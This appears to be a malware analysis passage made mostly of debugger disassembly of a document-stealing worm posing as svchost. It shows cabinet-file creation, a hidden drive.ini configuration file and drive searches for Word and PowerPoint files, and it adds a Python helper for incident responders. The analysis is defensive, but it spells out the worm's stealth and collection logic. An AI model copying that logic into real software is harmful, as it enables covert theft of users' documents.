00401728 90 90 90 90 90 90 90 90 ……..
The FCICreate function creates an FCI context.

hfci = FCICreate(&erf, //pointer to the FCI error structure
fnFilePlaced, //function to call when a file is placed
fnMemAlloc, //function to allocate memory
fnMemFree, //function to free memory
fnFileOpen, //function to open a file
fnFileRead, //function to read data from a file
fnFileWrite, //function to write data to a file
fnFileClose, //function to close a file
fnFileSeek, //function to move the file pointer
fnFileDelete, //function to delete a file
fnGetTempFileName, //function to obtain a temporary file name
&ccab, //pointer to the FCI cabinet information structure
NULL); //client context parameter, NULL for this sample.
0012F010 0012F05C (edx)
0012F014 00401720 svchost.00401720
0012F018 004015F0 svchost.004015F0
0012F01C 00401600 svchost.00401600
0012F020 00401610 svchost.00401610
0012F024 00401630 svchost.00401630
0012F028 00401650 svchost.00401650
0012F02C 00401670 svchost.00401670
0012F030 00401680 svchost.00401680
0012F034 004016A0 svchost.004016A0
0012F038 004016B0 svchost.004016B0

$-A4 > 008B2008 ASCII “C:\DOCUME~1\VICTOR\LOCALS~1\Temp\xx2”
$-A0 > 75157830 RETURN to CABINET.75157830
$-9C > 008B2008 ASCII “C:\DOCUME~1\VICTOR\LOCALS~1\Temp\xx2”
$-98 > 00000100

00412793 |. 8>CMP EAX,10
00412796 |. 7>JE SHORT svchost.004127BE
00412798 |. 8>CMP EAX,20
0041279B |. 7>JE SHORT svchost.004127B5
0041279D |. 8>CMP EAX,30
004127A0 |. 7>JE SHORT svchost.004127AC
004127A2 |. 8>CMP EAX,40
004127A5 |.^7>JNZ SHORT svchost.00412762
004127A7 |. 8>MOV DWORD PTR SS:[EBP-10],ESI
004127AA |. E>JMP SHORT svchost.004127C1
004127AC |> C>MOV DWORD PTR SS:[EBP-10],2
004127B3 |. E>JMP SHORT svchost.004127C1

0041289F |> 6>PUSH 0 ; /hTemplateFile = NULL
004128A1 |. 5>PUSH ESI ; |Attributes
004128A2 |. F>PUSH DWORD PTR SS:[EBP-8] ; |Mode
004128A5 |. 8>LEA EAX,DWORD PTR SS:[EBP-1C] ; |
004128A8 |. 5>PUSH EAX ; |pSecurity
004128A9 |. F>PUSH DWORD PTR SS:[EBP-10] ; |ShareMode
004128AC |. F>PUSH DWORD PTR SS:[EBP-C] ; |Access
004128AF |. F>PUSH DWORD PTR SS:[EBP+8] ; |FileName
004128B2 |. F>CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA

$-114 > 008B2008 |FileName = “C:\DOCUME~1\VICTOR\LOCALS~1\Temp\xx2”
$-110 > C0000000 |Access = GENERIC_READ|GENERIC_WRITE
$-10C > 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
$-108 > 0012EF1C |pSecurity = 0012EF1C
$-104 > 00000001 |Mode = CREATE_NEW
$-100 > 00000080 |Attributes = NORMAL
$-FC > 00000000 \hTemplateFile = NULL
$-F8 > 008B2008 ASCII “C:\DOCUME~1\VICTOR\LOCALS~1\Temp\xx2”

 
0040F017 |. E>CALL svchost.00401840 ; \svchost.00401840
0040F01C |. 6>PUSH svchost.00425D30 ; ASCII “ab+”
0040F021 |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F026 |. E>CALL svchost.00413E33

00413E33 /$ 6>PUSH 40
00413E35 |. F>PUSH DWORD PTR SS:[ESP+C]
00413E39 |. F>PUSH DWORD PTR SS:[ESP+C]
00413E3D |. E>CALL svchost.00413E13

0040F0DD |> 8>MOV EBX,DWORD PTR DS:[<&KERNEL32.GetPriv>; kernel32.GetPrivateProfileStringA
0040F0E3 |. 3>XOR EDX,EDX
0040F0E5 |. 6>PUSH svchost.0042A378 ; /IniFileName = “C:\WINDOWS\drive.ini”
0040F0EA |. 8>LEA EAX,DWORD PTR SS:[ESP+4C] ; |
0040F0EE |. 6>PUSH 0A ; |BufSize = A (10.)
0040F0F0 |. 8>MOV DWORD PTR SS:[ESP+50],EDX ; |
0040F0F4 |. 5>PUSH EAX ; |ReturnBuffer
0040F0F5 |. 6>PUSH svchost.0042A10C ; |Default = “”
0040F0FA |. 8>MOV DWORD PTR SS:[ESP+5C],EDX ; |
0040F0FE |. 6>PUSH svchost.004264F4 ; |Key = “LastHigh”
0040F103 |. 6>PUSH svchost.00426168 ; |Section = “Details”
0040F108 |. 6>MOV WORD PTR SS:[ESP+68],DX ; |
0040F10D |. F>CALL EBX ; \GetPrivateProfileStringA
0040F10F |. 8>LEA ECX,DWORD PTR SS:[ESP+48]
0040F113 |. 5>PUSH ECX
0040F114 |. E>CALL svchost.004142D5
0040F119 |. 8>ADD ESP,4
0040F11C |. 8>MOV DWORD PTR SS:[ESP+6C],EAX
0040F120 |. 3>XOR EDX,EDX
0040F122 |. 8>LEA EAX,DWORD PTR SS:[ESP+48]
0040F126 |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F12B |. 6>PUSH 0A
0040F12D |. 8>MOV DWORD PTR SS:[ESP+50],EDX
0040F131 |. 5>PUSH EAX
0040F132 |. 6>PUSH svchost.0042A10C
0040F137 |. 8>MOV DWORD PTR SS:[ESP+5C],EDX
0040F13B |. 6>PUSH svchost.004264EC ; ASCII “LastLow”
0040F140 |. 6>PUSH svchost.00426168 ; ASCII “Details”
0040F145 |. 6>MOV WORD PTR SS:[ESP+68],DX
0040F14A |. F>CALL EBX
0040F14C |. 8>LEA ECX,DWORD PTR SS:[ESP+48]
0040F150 |. 5>PUSH ECX
0040F151 |. E>CALL svchost.004142D5
0040F156 |. 8>MOV ECX,DWORD PTR SS:[ESP+7C] ; |
0040F15A |. 3>XOR EDX,EDX ; |
0040F15C |. 8>MOV DWORD PTR SS:[ESP+6C],EAX ; |
0040F160 |. 8>MOV DWORD PTR SS:[ESP+4C],EDX ; |
0040F164 |. 8>LEA EAX,DWORD PTR SS:[ESP+4C] ; |
0040F168 |. 6>PUSH 0A ; |Arg3 = 0000000A
0040F16A |. 8>MOV DWORD PTR SS:[ESP+54],EDX ; |
0040F16E |. 5>PUSH EAX ; |Arg2
0040F16F |. 5>PUSH ECX ; |Arg1
0040F170 |. 6>MOV WORD PTR SS:[ESP+60],DX ; |
0040F175 |. E>CALL svchost.00414290 ; \svchost.00414290
0040F17A |. 8>MOV ESI,DWORD PTR DS:[<&KERNEL32.WritePr>; kernel32.WritePrivateProfileStringA
0040F180 |. 8>ADD ESP,10
0040F183 |. 8>LEA EDX,DWORD PTR SS:[ESP+48]
0040F187 |. 6>PUSH svchost.0042A378 ; /FileName = “C:\WINDOWS\drive.ini”
0040F18C |. 5>PUSH EDX ; |String
0040F18D |. 6>PUSH svchost.004264F4 ; |Key = “LastHigh”
0040F192 |. 6>PUSH svchost.00426168 ; |Section = “Details”
0040F197 |. F>CALL ESI ; \WritePrivateProfileStringA
0040F199 |. 8>MOV EDX,DWORD PTR SS:[ESP+74]
0040F19D |. 3>XOR EAX,EAX
0040F19F |. 8>MOV DWORD PTR SS:[ESP+48],EAX
0040F1A3 |. 8>LEA ECX,DWORD PTR SS:[ESP+48]
0040F1A7 |. 6>PUSH 0A ; /Arg3 = 0000000A
0040F1A9 |. 8>MOV DWORD PTR SS:[ESP+50],EAX ; |
0040F1AD |. 5>PUSH ECX ; |Arg2
0040F1AE |. 5>PUSH EDX ; |Arg1
0040F1AF |. 6>MOV WORD PTR SS:[ESP+5C],AX ; |
0040F1B4 |. E>CALL svchost.00414290 ; \svchost.00414290
0040F1B9 |. 8>ADD ESP,0C
0040F1BC |. 8>LEA EAX,DWORD PTR SS:[ESP+48]
0040F1C0 |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F1C5 |. 5>PUSH EAX
0040F1C6 |. 6>PUSH svchost.004264EC ; ASCII “LastLow”
0040F1CB |. 6>PUSH svchost.00426168 ; ASCII “Details”
0040F1D0 |. F>CALL ESI
0040F1D2 |. 5>PUSH EDI
0040F1D3 |. E>CALL svchost.00413CB3
0040F1D8 |. 5>PUSH EBP
0040F1D9 |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F1DE |. E>CALL svchost.00413E46
0040F1E3 |. 8>ADD ESP,0C
0040F1E6 |. 8>TEST EAX,EAX
0040F1E8 |. 7>JNZ SHORT svchost.0040F1F7
0040F1EA |. 6>PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM
0040F1EC |. 6>PUSH svchost.0042A378 ; |FileName = “C:\WINDOWS\drive.ini”
0040F1F1 |. F>CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
0040F1F7 |> 3>CMP DWORD PTR SS:[ESP+6C],EBP

0040F1FB |. 7>JE SHORT svchost.0040F207
0040F1FD |. 3>CMP DWORD PTR SS:[ESP+68],EBP
0040F201 |. 0>JNZ svchost.0040F46B


The document-malware part:

0040F46B |> 6>PUSH svchost.00426178
0040F470 |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F475 |. E>CALL svchost.00413E33
0040F47A |. 8>ADD ESP,8
0040F47D |. 3>CMP EAX,EBP
0040F47F |. 7>JE SHORT svchost.0040F4C7
0040F481 |. B>MOV ECX,41
0040F486 |. 3>XOR EAX,EAX
0040F488 |. 8>LEA EDI,DWORD PTR SS:[ESP+414]
0040F48F |. 6>PUSH svchost.0042A378 ; ASCII “C:\WINDOWS\drive.ini”
0040F494 |. F>REP STOS DWORD PTR ES:[EDI]
0040F496 |. 8>LEA EAX,DWORD PTR SS:[ESP+418]
0040F49D |. 6>PUSH 104
0040F4A2 |. 5>PUSH EAX
0040F4A3 |. 6>PUSH svchost.0042A10C
0040F4A8 |. 6>PUSH svchost.004264E0 ; ASCII “FileType”
0040F4AD |. 6>PUSH svchost.00426168 ; ASCII “Details”
0040F4B2 |. F>CALL EBX
0040F4B4 |. 8>TEST EAX,EAX
0040F4B6 |. 7>JNZ SHORT svchost.0040F4DC
0040F4B8 |. 8>LEA ECX,DWORD PTR SS:[ESP+414]
0040F4BF |. 6>PUSH svchost.004264C4 ; ASCII “*.doc;*.docx;*.ppt;*.pptx”
0040F4C4 |. 5>PUSH ECX
0040F4C5 |. E>JMP SHORT svchost.0040F4D4
0040F4C7 |> 8>LEA EDX,DWORD PTR SS:[ESP+414]
0040F4CE |. 6>PUSH svchost.004264C4 ; ASCII “*.doc;*.docx;*.ppt;*.pptx”
0040F4D3 |. 5>PUSH EDX
0040F4D4 |> E>CALL svchost.004130C0
0040F4D9 |. 8>ADD ESP,8
0040F4DC |> 8>LEA EAX,DWORD PTR SS:[ESP+44]
0040F4E0 |. 6>PUSH svchost.00426110 ; ASCII “C:”
0040F4E5 |. 5>PUSH EAX
$+4F0 > 0042A378 |FileName = “C:\WINDOWS\drive.ini”
$+4F4 > 80000000 |Access = GENERIC_READ
$+4F8 > 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
$+4FC > 0012F520 |pSecurity = 0012F520
$+500 > 00000003 |Mode = OPEN_EXISTING
$+504 > 00000080 |Attributes = NORMAL
$+508 > 00000000 \hTemplateFile = NULL
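The drive.ini handling shown above (GetPrivateProfileStringA on the Details section for LastHigh, LastLow and FileType, with the built-in "*.doc;*.docx;*.ppt;*.pptx" list used when FileType comes back empty) reduced to a Python triage helper that reports the configuration a recovered drive.ini would give the worm. This is an added example, not code from the sample or from the original analysis; it assumes the helpers at 004142D5 and 00414290 are atoi/itoa-style decimal converters (the page shows them only by address and the radix-10 argument) and uses a constructed INI body.

```python
import configparser
import fnmatch
# Values taken from the disassembly: INI section/key names, default pattern list,
# and the buffer sizes pushed before GetPrivateProfileStringA.
SECTION = "Details"
DEFAULT_FILETYPE = "*.doc;*.docx;*.ppt;*.pptx"   # string at svchost.004264C4
FILETYPE_BUFSIZE = 0x104                          # PUSH 104 before the FileType read
LAST_BUFSIZE = 0x0A                               # PUSH 0A before LastHigh/LastLow

def read_profile_string(ini_text, section, key, default, bufsize):
    """Approximate GetPrivateProfileStringA on in-memory INI text: case-insensitive
    section/key lookup, `default` when either is missing, and the result cut to
    bufsize-1 characters (the API reserves one byte for the terminating NUL)."""
    cp = configparser.RawConfigParser(strict=False)   # no % interpolation
    cp.optionxform = str.lower
    cp.read_string(ini_text)
    value = default
    for name in cp.sections():
        if name.lower() == section.lower():
            value = cp.get(name, key, fallback=default)
            break
    return value[:max(bufsize - 1, 0)]

def to_int(text):
    """Assumption: the helpers at 004142D5/00414290 are atoi/itoa-style (radix
    0Ah is passed), so these keys hold decimal strings; non-numeric reads as 0."""
    digits = text.strip()
    return int(digits) if digits.lstrip("-").isdigit() else 0

def effective_config(ini_text):
    """Settings the worm ends up with for a given drive.ini body. An empty or
    missing FileType (TEST EAX,EAX -> JNZ not taken) falls back to the built-in
    list; a drive.ini that does not exist is modelled as empty text."""
    filetype = read_profile_string(ini_text, SECTION, "FileType", "", FILETYPE_BUFSIZE)
    if not filetype:
        filetype = DEFAULT_FILETYPE
    return {
        "FileType": filetype,
        "patterns": [p for p in filetype.split(";") if p],
        "LastHigh": to_int(read_profile_string(ini_text, SECTION, "LastHigh", "", LAST_BUFSIZE)),
        "LastLow": to_int(read_profile_string(ini_text, SECTION, "LastLow", "", LAST_BUFSIZE)),
    }

def matches_filetype(filename, patterns):
    """Case-insensitive match against the ';'-separated wildcard list, as a
    Windows FindFirstFile filter would treat a document name."""
    return any(fnmatch.fnmatch(filename.lower(), p.lower()) for p in patterns)

# Constructed sample drive.ini body (not from the analysed system).
SAMPLE_INI = "[Details]\nLastHigh=30\nLastLow=123456789\nFileType=*.xls;*.pdf\n"
```

Feeding it the body of a drive.ini recovered from an infected host tells an incident responder which document types the worm was collecting, which is what the TEST EAX,EAX branch above decides.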


00402491 |. 5>PUSH ECX ; /pFindFileData
00402492 |. 5>PUSH EAX ; |FileName
00402493 |. F>CALL DWORD PTR DS:[<&KERNEL32.FindFirstF>; \FindFirstFileA
00402499 |. 8>TEST EAX,EAX
0040249B |. 8>MOV DWORD PTR SS:[ESP+28],EAX
0040249F |. 0>JE svchost.004028F2

0012F334 008B0B89 |FileName = “C:\*”
0012F338 0012F42C \pFindFileData = 0012F42C

004024CD |> 8>/CMP BYTE PTR SS:[ESP+11C],2E
004024D5 |. 0>|JE svchost.004028B1
004024DB |. B>|MOV ESI,svchost.004252D4 ; ASCII “System Volume Information”
004024E0 |. 8>|LEA EAX,DWORD PTR SS:[ESP+11C]
004024E7 |> 8>|/MOV DL,BYTE PTR DS:[EAX]
004024E9 |. 8>||MOV CL,DL
004024EB |. 3>||CMP DL,BYTE PTR DS:[ESI]

0012F458 41 55 54 4F 45 58 45 43 AUTOEXEC
0012F460 2E 42 41 54 00 00 00 00 .BAT….
0012F468 00 00 00 00 00 00 00 …….

0012F2B4 0012F2DC |Arg1 = 0012F2DC
0012F2B8 0012F300 |Arg2 = 0012F300
0012F2BC 008B0BD1 |Arg3 = 008B0BD1 ASCII “AUTOEXEC.BAT”
0012F2C0 0000000C |Arg4 = 0000000C
0012F2C4 0000001F \Arg5 = 0000001F

00401EB3 . 8>LEA ECX,DWORD PTR SS:[ESP+24] ; |
00401EB7 . C>MOV BYTE PTR SS:[ESP+5C],3 ; |
00401EBC . 5>PUSH ECX ; |Arg1
00401EBD . 8>MOV ECX,EDI ; |
00401EBF . E>CALL svchost.00402040 ; \svchost.00402040

0012F2B4 0012F2DC |Arg1 = 0012F2DC
0012F2B8 0012F300 |Arg2 = 0012F300
0012F2BC 008B0BD1 |Arg3 = 008B0BD1 ASCII “boot.ini”
0012F2C0 00000008 |Arg4 = 00000008
0012F2C4 0000001F \Arg5 = 0000001F

00401EB3 . 8>LEA ECX,DWORD PTR SS:[ESP+24] ; |
00401EB7 . C>MOV BYTE PTR SS:[ESP+5C],3 ; |
00401EBC . 5>PUSH ECX ; |Arg1
00401EBD . 8>MOV ECX,EDI ; |
00401EBF . E>CALL svchost.00402040 ; \svchost.00402040
